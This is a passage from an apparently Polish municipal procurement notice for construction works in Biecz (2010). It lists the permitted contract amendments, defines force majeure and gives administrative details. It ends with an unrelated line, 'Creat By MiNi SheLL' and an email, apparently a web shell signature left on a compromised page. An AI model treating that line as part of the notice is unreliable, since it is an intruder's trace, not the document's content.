-konieczność udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało się  konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby podniesienia niewspółmiernie wysokich kosztów lub prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego,
-wystąpienie okoliczności uniemożliwiających wykonanie robót w okresie zimowym i obniżonych temperatur pomimo wykonania zabezpieczeń i zapewnienia przez Wykonawcę warunków dla realizacji tych robót w okresie zimowym i obniżonych temperatur. Wystąpienie tych okoliczności na  wniosek Wykonawcy potwierdzi inspektor nadzoru,
-wystąpienie okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy,
-aktualizację rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu materiałów lub urządzeń);
-wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązującymi przepisami;
-wystąpienie siły wyższej;
-nie przekazanie przez zamawiającego placu budowy w terminie określonym w umowie;
-niezawinionego przez wykonawcę ograniczenia dostępności placu budowy w czasie realizacji robót;
-wstrzymania przez zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie wykonawcy. (Nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę) -  termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności;

2.	Zmiana kluczowego personelu zamawiającego i wykonawcy z powodu:

   - śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych dotyczących  kierownika budowy,  kierowników robót lub inspektora nadzoru,
       -  zastrzeżeń jednej ze stron, co do kompetencji kierownika budowy lub inspektora nadzoru.

3.	Zmiana wysokości stawki podatku VAT w przypadku:

- zwiększenia stawki podatku VAT.

Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.

     Dla potrzeb Umowy, Siła Wyższa oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu  należytej staranności,                        a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, zmiany klimatyczne, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki.
4.	Warunki zmian:
- inicjowanie zmian - na wniosek wykonawcy lub zamawiającego,
- uzasadnienie zmian- prawidłowa realizacja przedmiotu umowy, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
- forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 20, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 10:00, miejsce: Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 1, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com